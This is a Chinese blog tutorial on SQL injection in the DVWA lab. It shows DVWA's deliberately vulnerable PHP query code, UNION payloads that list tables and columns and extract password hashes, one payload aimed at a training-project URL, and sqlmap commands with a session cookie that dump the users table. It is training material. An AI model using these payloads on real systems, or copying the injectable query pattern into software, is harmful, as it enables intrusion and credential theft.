yuanmouensis313's blog

welcome

0%

sql注入漏洞

Posted on In

1. SQL注入

1. SQL注入 low

1)认识
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    } 
}

?>

其中重点为

1
SELECT first_name, last_name FROM users WHERE user_id = '$id';

这是其中执行的SQL语句,我们可以通过在输入的id中做手脚进行更改,比如

1
SELECT first_name, last_name FROM users WHERE user_id = '-1' union select 1, 2 #';

也就是输入-1’ union select 1, 2 #,使得执行的sql变为以上结果

执行结果为

image-20230711231049281

2)sql漏洞利用步骤

①使用order by 判断列数

1
2
3
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1 #';
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2 #';
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3 #';

网页在order by 便为3时报错,说明数据库应该是有两列

②联合查询其他信息

1
SELECT first_name, last_name FROM users WHERE user_id = '1' union select [sql1], [sql2], ... #';

注意,联合查询的对象数量一个和数据库的列数量相同,才能联合在一起

查询表dvwa这个数据库下的表名

1
SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name, table_schema from information_schema.tables where table_schema="dvwa" #';

结果为

image-20230711232927994

有两个表分别为guestbook和users

查询users这个表下面有哪些列

1
SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1, column_name from information_schema.columns where table_schema="dvwa" and table_name ="users" #';

结果为

image-20230711233533478

一共有8列,列名如上图

查询users 这个表中存储的用户名及其对应的密码

1
SELECT first_name, last_name FROM users WHERE user_id = '1' union select first_name, password from dvwa.users #';

结果为

image-20230711233932844

可以看到有5个用户,密码应该是散列码

比如实训项目中

查询double_fish数据库下t_admin表中的列名

1
http://www.wabjtam.ml:12380/News/newsView.php?newsId=-1 union  select 1, 2, group_concat(column_name), 4, 5 from information_schema.columns where table_schema = "double_fish" and table_name="t_admin";

使用group_concat()函数将结果放于一处

结果为

image-20230712090740476

3)使用sqlmap

①测试是否有漏洞

1
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low"

-u:进行sql注入的注入点

–cookie:由于dvwa需要登录,因此我们带上cookie

②查看数据库名

1
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low" --dbs

结果为

image-20230712092554783

③查看表名

1
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low" -D dvwa --tables

④查看列名

1
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low" -D dvwa -T users -columns

⑤查看表中所有信息

1
python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="PHPSESSID=ilkvra6al6b12g57ab5cvn04qr; security=low" -D dvwa -T users -dump
--------------本文结束感谢您的阅读--------------